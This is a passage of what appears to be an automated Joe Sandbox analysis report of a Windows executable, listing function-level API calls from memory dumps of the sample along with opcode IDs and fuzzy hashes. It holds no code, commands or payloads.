                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Cnd_broadcastCurrentThreadmtx_do_lock
                    • String ID:
                    • API String ID: 3471820992-0
                    • Opcode ID: 4896411b383d157f97ad413047a1fae5a3bc2dcd9fd685ee29b50a4178746b95
                    • Instruction ID: e825d9dc3a901559c5738fae14c527551fe8a17dfb067f9c5c2eb0eb023bb9bf
                    • Opcode Fuzzy Hash: 4896411b383d157f97ad413047a1fae5a3bc2dcd9fd685ee29b50a4178746b95
                    • Instruction Fuzzy Hash: 0241DFB09002069BCB20DB65CA45B9AB7F8FF14354F10453EE816E77C0EB78E900DB85
                    APIs
                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 044F1EB7
                      • Part of subcall function 044F2186: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,044F1BFF), ref: 044F2196
                    • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 044F1ECC
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 044F1EDB
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 044F1F9F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::std::invalid_argument::invalid_argument$ExecutionFreeIdleObjectProcessorProxy::ResetRoot::SingleSuspendThreadVirtualWait
                    • String ID:
                    • API String ID: 1312548968-0
                    • Opcode ID: 46bbec9c4a74e2517c7a14b99cc54b57c0e90a5362bc5d5245cb815f45bf4e2b
                    • Instruction ID: 99848becba7e4ba60b41b2e56d37a30dd0325441d479f20c355f0b6654fec7c2
                    • Opcode Fuzzy Hash: 46bbec9c4a74e2517c7a14b99cc54b57c0e90a5362bc5d5245cb815f45bf4e2b
                    • Instruction Fuzzy Hash: AF31D035A00214EBDF04EF65CC90A6E73B9BF54324F20456AEA11AB392DB70FE05CA94
                    APIs
                    • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 044E3086
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BuffersConcurrency::details::InitializeManager::Resource
                    • String ID:
                    • API String ID: 3433162309-0
                    • Opcode ID: a234e4d9aaa44325fe8aabf8c45c9f14648ba9bac9e67dd657a2e3e0d137f597
                    • Instruction ID: 91c02eb5539d83a72b62fbbfd0617270cfdc3491a87c97f8cbbc782e7fbaa9cc
                    • Opcode Fuzzy Hash: a234e4d9aaa44325fe8aabf8c45c9f14648ba9bac9e67dd657a2e3e0d137f597
                    • Instruction Fuzzy Hash: 53313775A00309EFDF11DF96C8C0ABEBBB9AF44216F0404AEDD41AB346D731A945DBA0
                    APIs
                    • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00422E1F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BuffersConcurrency::details::InitializeManager::Resource
                    • String ID:
                    • API String ID: 3433162309-0
                    • Opcode ID: a234e4d9aaa44325fe8aabf8c45c9f14648ba9bac9e67dd657a2e3e0d137f597
                    • Instruction ID: 9beed26a825f1ece50d1044237a9d26a4491e3443ab310ceb7be1a93bb172293
                    • Opcode Fuzzy Hash: a234e4d9aaa44325fe8aabf8c45c9f14648ba9bac9e67dd657a2e3e0d137f597
                    • Instruction Fuzzy Hash: DF318B75A00319EFCF10DF94DAC0AAE7BB9BF44304F4504AADD01AB346D7B4A944EBA5
                    APIs
                      • Part of subcall function 044F6D43: _free.LIBCMT ref: 044F6D51
                      • Part of subcall function 044FEC30: WideCharToMultiByte.KERNEL32(044C89D7,00000000,0045FBB0,00000000,044C89D7,044C89D7,04500959,?,0045FBB0,?,00000000,?,045006C8,0000FDE9,00000000,?), ref: 044FECD2
                    • GetLastError.KERNEL32 ref: 044FDCC1
                    • __dosmaperr.LIBCMT ref: 044FDCC8
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 044FDD07
                    • __dosmaperr.LIBCMT ref: 044FDD0E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                    • String ID:
                    • API String ID: 167067550-0
                    • Opcode ID: c8943f67770a71c681cacb93ba9244fcfe4fd80ccef22594de2015d7acb6ada7
                    • Instruction ID: a55beca3d9ace727bd203982c1681c1b3e43d4b0c7c013b953af2da44d13e265
                    • Opcode Fuzzy Hash: c8943f67770a71c681cacb93ba9244fcfe4fd80ccef22594de2015d7acb6ada7
                    • Instruction Fuzzy Hash: 5821DBB1A006056FFF206F62DC80867779DEF04269310452EFB2A97251F735FD018790
                    APIs
                      • Part of subcall function 00436ADC: _free.LIBCMT ref: 00436AEA
                      • Part of subcall function 0043E9C9: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00444E60,?,00000000,00000000), ref: 0043EA6B
                    • GetLastError.KERNEL32 ref: 0043DA5A
                    • __dosmaperr.LIBCMT ref: 0043DA61
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0043DAA0
                    • __dosmaperr.LIBCMT ref: 0043DAA7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                    • String ID:
                    • API String ID: 167067550-0
                    • Opcode ID: 51b3f88ffa2c966f3eb13bb54b6583cd5cdaab86051bcbcaf0285219fddad464
                    • Instruction ID: 3d9dcb479ea73530b4d2aa109c1a6950b544f6a37a2d41994a632baa8fad223f
                    • Opcode Fuzzy Hash: 51b3f88ffa2c966f3eb13bb54b6583cd5cdaab86051bcbcaf0285219fddad464
                    • Instruction Fuzzy Hash: D521C7B1A082057F9B20BF66AD81D6BB7ADEF4C368F10911AF82597241D738EC418798
                    APIs
                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 044F1BFA
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 044F1C19
                    • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 044F1C60
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$ExecutionFreeIdleProcessorProxy::Root::SpinSuspendThreadUntilVirtualstd::invalid_argument::invalid_argument
                    • String ID:
                    • API String ID: 1284976207-0
                    • Opcode ID: 7696fed31027723f35f026be7f56ee9a288ab6992535e51fad3a21373ee75dd4
                    • Instruction ID: 3fe5f4d87a67aea452ddab808ab9be84e177b940cc0e5a6cd0bb75188ca542e3
                    • Opcode Fuzzy Hash: 7696fed31027723f35f026be7f56ee9a288ab6992535e51fad3a21373ee75dd4
                    • Instruction Fuzzy Hash: A8212435700615DBDF15AB25CC94ABEB3A5BF84329F04016BE612876E2EB64BC42CBD0
                    APIs
                    • SetEvent.KERNEL32(?,00000000,?), ref: 044F0E61
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 044F0E49
                      • Part of subcall function 044E92A6: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 044E92C7
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 044F0EC4
                    • SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,0045F550), ref: 044F0EC9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Context$Event$Base::Concurrency::details::$Trace$SwitchThreadThrow
                    • String ID:
                    • API String ID: 2734100425-0
                    • Opcode ID: e3d9029423d789f94a365431142f713fb9992c83376263fe4c5804e28f9d592b
                    • Instruction ID: 1f0d90f2628ba46b07df27250a51658696b0c593784701b9f4b084ea7ca44383
                    • Opcode Fuzzy Hash: e3d9029423d789f94a365431142f713fb9992c83376263fe4c5804e28f9d592b
                    • Instruction Fuzzy Hash: AA210775700214AFEF10AB5ACC44D7EF7A8EF84326B10045BEA15A3292DB70BD018A95
                    APIs
                    • SetEvent.KERNEL32(?,00000000,?), ref: 00430BFA
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00430BE2
                      • Part of subcall function 0042903F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00429060
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00430C5D
                    • SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,0045F550), ref: 00430C62
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Context$Event$Base::Concurrency::details::$Trace$SwitchThreadThrow
                    • String ID:
                    • API String ID: 2734100425-0
                    • Opcode ID: e3d9029423d789f94a365431142f713fb9992c83376263fe4c5804e28f9d592b
                    • Instruction ID: 57bdfcda8ae773349b13e319bab3268c626313179c611564d1a2f16d6c6a901f
                    • Opcode Fuzzy Hash: e3d9029423d789f94a365431142f713fb9992c83376263fe4c5804e28f9d592b
                    • Instruction Fuzzy Hash: 52214635700228AFCB14EB59DC45D6EB3BCEF48325F10025BFA15A3392CA74AD018AAD
                    APIs
                    • __EH_prolog3_catch.LIBCMT ref: 044EA013
                    • std::bad_exception::bad_exception.LIBCMT ref: 044EA075
                    • Concurrency::SchedulerPolicy::_ResolvePolicyValues.LIBCONCRT ref: 044EA0B7
                    • std::bad_exception::bad_exception.LIBCMT ref: 044EA0E1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_ResolveSchedulerValues
                    • String ID:
                    • API String ID: 3836581985-0
                    • Opcode ID: e835eb99146f594c7acaf21ac20e86472269475117582055c97d9105f8bbd4a9
                    • Instruction ID: 2b21800a4f1ab2f968c484ea1c71c9551530819cbda17c653e006420cacf85f6
                    • Opcode Fuzzy Hash: e835eb99146f594c7acaf21ac20e86472269475117582055c97d9105f8bbd4a9
                    • Instruction Fuzzy Hash: CF215E719006049FEF05EFA6D884ABDB7B4AF05316F10406BE405BB291EB727D46CB55
                    APIs
                    • __EH_prolog3_catch.LIBCMT ref: 00429DAC
                    • Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00429DF8
                    • std::bad_exception::bad_exception.LIBCMT ref: 00429E0E
                    • std::bad_exception::bad_exception.LIBCMT ref: 00429E7A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
                    • String ID:
                    • API String ID: 2033596534-0
                    • Opcode ID: fd3d8391b4e16ad7b459efb2503c900801a1ac98567aed87c49c3d323d2e6ad5
                    • Instruction ID: 4e4e7a5eb7143f9fbb3103a1f6126f4c5a38472fe452da36fe41685c322f6648
                    • Opcode Fuzzy Hash: fd3d8391b4e16ad7b459efb2503c900801a1ac98567aed87c49c3d323d2e6ad5
                    • Instruction Fuzzy Hash: 5A21C771A04124DFDB04EFA5E88299E77B4BF05314F61402FF401AB291DB396D45CB9D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9abb9358dcd3ddc380508ec514d82bb73023dc79706600e3520e5c488b77e48a
                    • Instruction ID: bbae62fb23116b2adcf5c960c36d7ece776b802ef08a573278454c7bbf46ea66
                    • Opcode Fuzzy Hash: 9abb9358dcd3ddc380508ec514d82bb73023dc79706600e3520e5c488b77e48a
                    • Instruction Fuzzy Hash: 2921C332A01365ABDF318E64EC45B1B3759DB027A9F281122EA06A7391E638FD0186E4
                    APIs
                    • Concurrency::details::SchedulingNode::AddVirtualProcessor.LIBCONCRT ref: 044E5278
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 044E529B
                    • __EH_prolog3.LIBCMT ref: 044E52B6
                    • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 044E52DD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CacheConcurrency::details::GroupLocalSchedule$H_prolog3Node::ProcessorSchedulingSegmentSegment::Virtualstd::invalid_argument::invalid_argument
                    • String ID:
                    • API String ID: 2642201467-0
                    • Opcode ID: dcb6518a219445a902490e620ad7a0acbd17b34d3e18e9501e74e8f351b44a97
                    • Instruction ID: 1711f257aafa3b9dafe50486e065d6fc7a0b641aae992fb3651b7c343d29d68f
                    • Opcode Fuzzy Hash: dcb6518a219445a902490e620ad7a0acbd17b34d3e18e9501e74e8f351b44a97
                    • Instruction Fuzzy Hash: 3321A134A00115EFDF04EF9AC890ABD73B5BF48309F10406FE5069B292DB71B901CB55
                    APIs
                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 044F173B
                    • Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 044F16EC
                      • Part of subcall function 044E8692: SafeRWList.LIBCONCRT ref: 044E86A3
                    • SafeRWList.LIBCONCRT ref: 044F1731
                    • Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 044F1751
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Base::Concurrency::details::ContextListSafeStealer$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                    • String ID:
                    • API String ID: 336577199-0
                    • Opcode ID: 18e975a48efa1344399c822bb128d39c4957d69b814f3f6e6406d807d4ec682a
                    • Instruction ID: a8e724ac368a5726f60a2bf05e2be8fec40d532ba5511e5b99185acc099bd18a
                    • Opcode Fuzzy Hash: 18e975a48efa1344399c822bb128d39c4957d69b814f3f6e6406d807d4ec682a
                    • Instruction Fuzzy Hash: B521837160020ADFDF04DF25C890EA5F7E9BB84219F14D2ABD5094B242E735F999CB90
                    APIs
                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 004314D4
                    • Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 00431485
                      • Part of subcall function 0042842B: SafeRWList.LIBCONCRT ref: 0042843C
                    • SafeRWList.LIBCONCRT ref: 004314CA
                    • Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 004314EA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Base::Concurrency::details::ContextListSafeStealer$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                    • String ID:
                    • API String ID: 336577199-0
                    • Opcode ID: 18e975a48efa1344399c822bb128d39c4957d69b814f3f6e6406d807d4ec682a
                    • Instruction ID: 32539ca2320707ce92c09178d01679dab9e49ab6512ed056795bb6ab421abb97
                    • Opcode Fuzzy Hash: 18e975a48efa1344399c822bb128d39c4957d69b814f3f6e6406d807d4ec682a
                    • Instruction Fuzzy Hash: EC21F53160020EDFC704DF24C880EA5FBA9FB98318F54E2ABD4054B152DB39E99ACB94
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0f756fd091728f1714fffd2efd6505197b9063550eda6cdbc8ad120b831c3f96
                    • Instruction ID: 05d93fe1e3f76ddbc42813109b4ebb6139782de3b816a21b518e5d0122c5ad61
                    • Opcode Fuzzy Hash: 0f756fd091728f1714fffd2efd6505197b9063550eda6cdbc8ad120b831c3f96
                    • Instruction Fuzzy Hash: B211B635A01725ABDF324F689C44E1B3768AF01760F160267EA15A7391EF70FD0396E4
                    APIs
                    • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 044DF686
                      • Part of subcall function 044DF842: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 044E57FD
                    • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 044DF6A7
                      • Part of subcall function 044E0529: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 044E0545
                    • Concurrency::details::GetSharedTimerQueue.LIBCONCRT ref: 044DF6C3
                    • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 044DF6CA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Timer$Scheduler$Base::LibraryLoadQueue$AsyncConcurrency::details::platform::__ContextCreateCurrentDefaultReferenceRegisterShared
                    • String ID:
                    • API String ID: 1684785560-0
                    • Opcode ID: de37ef8548d7ff2425975f26c8540d16b97df320fc27a0a145ef4d2f0385f2a7
                    • Instruction ID: d11f801bf4e4961f8debcf564f11801091accc190765bdcc192d232d688741d7
                    • Opcode Fuzzy Hash: de37ef8548d7ff2425975f26c8540d16b97df320fc27a0a145ef4d2f0385f2a7
                    • Instruction Fuzzy Hash: 1F01F9B1500305BFEF307F668C8089BBBACDF25358B10493FB856D2652D7B0B50A87A5
                    APIs
                    • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041F41F
                      • Part of subcall function 0041F5DB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00425596
                    • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0041F440
                      • Part of subcall function 004202C2: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004202DE
                    • Concurrency::details::GetSharedTimerQueue.LIBCONCRT ref: 0041F45C
                    • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 0041F463
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Timer$Scheduler$Base::LibraryLoadQueue$AsyncConcurrency::details::platform::__ContextCreateCurrentDefaultReferenceRegisterShared
                    • String ID:
                    • API String ID: 1684785560-0
                    • Opcode ID: de37ef8548d7ff2425975f26c8540d16b97df320fc27a0a145ef4d2f0385f2a7
                    • Instruction ID: c143f49b80a8edc336b5adb3e2ea19dd9ba997e834122e1f90eeb7ad8e6c388c
                    • Opcode Fuzzy Hash: de37ef8548d7ff2425975f26c8540d16b97df320fc27a0a145ef4d2f0385f2a7
                    • Instruction Fuzzy Hash: 3B018E71900305BBD7207F6ACC819DBBBA8DF20358B10893FF85492142D778998A87AD
                    APIs
                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 044F3750
                    • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 044F3764
                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 044F377C
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 044F3794
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                    • String ID:
                    • API String ID: 78362717-0
                    • Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                    • Instruction ID: f5be3a5dc4f62ea34fc1e3d445c243a1e08cb5dcfc3e7a73d4707ef1c6cf7dc4
                    • Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                    • Instruction Fuzzy Hash: 1001D672B00514A7DF25AE968C40AEFB7D9AF45258F00405BEE15EB381D971FD0196A1
                    APIs
                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 004334E9
                    • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 004334FD
                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00433515
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0043352D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                    • String ID:
                    • API String ID: 78362717-0
                    • Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                    • Instruction ID: b333cc5f23de22d3145c9e3758e484d235afa0bb9630b9fa484c080b45391314
                    • Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                    • Instruction Fuzzy Hash: CF012636700514B7CF16EE5AC842EAF77A99F58364F00001BFC12EB382DA75EE01C2A5
                    APIs
                    • GetFullPathNameW.KERNEL32(?,?,?,00000000,044FBBB8,00000000,?,045022B2,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 044FBA69
                    • GetLastError.KERNEL32(?,045022B2,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,044FBBB8,00000000,00000104,?), ref: 044FBA73
                    • __dosmaperr.LIBCMT ref: 044FBA7A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorFullLastNamePath__dosmaperr
                    • String ID:
                    • API String ID: 2398240785-0
                    • Opcode ID: 3cb03c1224146c58c06f7f86378dba41269a8bd7ae4eb61ccf8b67197a59bbf4
                    • Instruction ID: 0872bd1eb4e1c359acb741f2f5640e437b6ddb4882e48a0fab2a2bada25a0c68
                    • Opcode Fuzzy Hash: 3cb03c1224146c58c06f7f86378dba41269a8bd7ae4eb61ccf8b67197a59bbf4
                    • Instruction Fuzzy Hash: 62F06D32A00955BBDF205FA6DC08947FFA9FF453A17048526EA28C7521D731F851DBD0
                    APIs
                    • GetFullPathNameW.KERNEL32(?,?,?,00000000,044FBBB8,00000000,?,0450223D,00000000,00000000,044FBBB8,?,?,00000000,00000000,00000001), ref: 044FBAD2
                    • GetLastError.KERNEL32(?,0450223D,00000000,00000000,044FBBB8,?,?,00000000,00000000,00000001,00000000,00000000,?,044FBBB8,00000000,00000104), ref: 044FBADC
                    • __dosmaperr.LIBCMT ref: 044FBAE3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorFullLastNamePath__dosmaperr
                    • String ID:
                    • API String ID: 2398240785-0
                    • Opcode ID: 1c4d122a44d644f0ad1f63a0f385b8a873575328d9b4e1f6675adc0812a1f3d5
                    • Instruction ID: 69f126d989a97fb211dce271b72d19190c4e2d2f65175cf5e02f866ed845707c
                    • Opcode Fuzzy Hash: 1c4d122a44d644f0ad1f63a0f385b8a873575328d9b4e1f6675adc0812a1f3d5
                    • Instruction Fuzzy Hash: 55F06D32600655BB9F201FA2DC0885BBF69FF463A17008126F618C7A24E731F951CBD0
                    APIs
                    • GetFullPathNameW.KERNEL32(?,?,?,00000000,0043B951,00000000,?,0044204B,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0043B802
                    • GetLastError.KERNEL32(?,0044204B,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0043B951,00000000,00000104,?), ref: 0043B80C
                    • __dosmaperr.LIBCMT ref: 0043B813
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorFullLastNamePath__dosmaperr
                    • String ID:
                    • API String ID: 2398240785-0
                    • Opcode ID: 3cb03c1224146c58c06f7f86378dba41269a8bd7ae4eb61ccf8b67197a59bbf4
                    • Instruction ID: eea697dc5ee5a63e9bb000b8ca0ecb04d52ee882e46ab181b6f30ec3310184b0
                    • Opcode Fuzzy Hash: 3cb03c1224146c58c06f7f86378dba41269a8bd7ae4eb61ccf8b67197a59bbf4
                    • Instruction Fuzzy Hash: E4F08132600615BB8B252FA2DC08E5BBF6DFF483A0B109526F61CC7520D735E861CBD8
                    APIs
                    • GetFullPathNameW.KERNEL32(?,?,?,00000000,0043B951,00000000,?,00441FD6,00000000,00000000,0043B951,?,?,00000000,00000000,00000001), ref: 0043B86B
                    • GetLastError.KERNEL32(?,00441FD6,00000000,00000000,0043B951,?,?,00000000,00000000,00000001,00000000,00000000,?,0043B951,00000000,00000104), ref: 0043B875
                    • __dosmaperr.LIBCMT ref: 0043B87C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
